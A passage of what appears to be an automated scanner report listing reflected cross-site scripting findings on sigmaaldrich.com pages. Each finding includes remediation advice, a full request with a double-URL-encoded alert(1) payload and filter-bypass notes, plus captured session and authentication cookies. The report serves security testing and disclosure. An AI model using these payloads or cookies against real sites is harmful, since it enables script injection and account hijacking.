Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:36 GMT
Content-Length: 29004
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support47283";alert(1)//3b290623f04/customer-service/services/basic-research/technology-workshops","E404") ;
   </script>
...[SNIP]...

1.168. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afbf3%2522%253balert%25281%2529%252f%252f4ab08bcd55f was submitted in the REST URL parameter 4. This input was echoed as afbf3";alert(1)//4ab08bcd55f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-serviceafbf3%2522%253balert%25281%2529%252f%252f4ab08bcd55f/services/basic-research/technology-workshops HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:38 GMT
Content-Length: 29004
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-serviceafbf3";alert(1)//4ab08bcd55f/services/basic-research/technology-workshops","E404") ;
   </script>
...[SNIP]...

1.169. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12230%2522%253balert%25281%2529%252f%252f49f621b980a was submitted in the REST URL parameter 5. This input was echoed as 12230";alert(1)//49f621b980a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services12230%2522%253balert%25281%2529%252f%252f49f621b980a/basic-research/technology-workshops HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:40 GMT
Content-Length: 29004
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services12230";alert(1)//49f621b980a/basic-research/technology-workshops","E404") ;
   </script>
...[SNIP]...

1.170. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28c3f%2522%253balert%25281%2529%252f%252fee461c7ee2b was submitted in the REST URL parameter 6. This input was echoed as 28c3f";alert(1)//ee461c7ee2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services/basic-research28c3f%2522%253balert%25281%2529%252f%252fee461c7ee2b/technology-workshops HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:42 GMT
Content-Length: 29004
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services/basic-research28c3f";alert(1)//ee461c7ee2b/technology-workshops","E404") ;
   </script>
...[SNIP]...

1.171. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1672f%2522%253balert%25281%2529%252f%252f90c81e119b0 was submitted in the REST URL parameter 7. This input was echoed as 1672f";alert(1)//90c81e119b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 7 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /content/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops1672f%2522%253balert%25281%2529%252f%252f90c81e119b0 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:44 GMT
Content-Length: 29004
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/customer-support/customer-service/services/basic-research/technology-workshops1672f";alert(1)//90c81e119b0","E404") ;
   </script>
...[SNIP]...

1.172. http://www.sigmaaldrich.com/content/sigma-aldrich/customer-support/customer-service/services/facility-operations [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /content/sigma-aldrich/customer-support/customer-service/services/facility-operations

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4449%2522%253balert%25281%2529%252f%252fa68566a3237 was submitted in the REST URL parameter 1. This input was echoed as f4449";alert(1)//a68566a3237 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /contentf4449%2522%253balert%25281%2529%252f%252fa68566a3237/sigma-aldrich/customer-support/customer-service/services/facility-operations HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
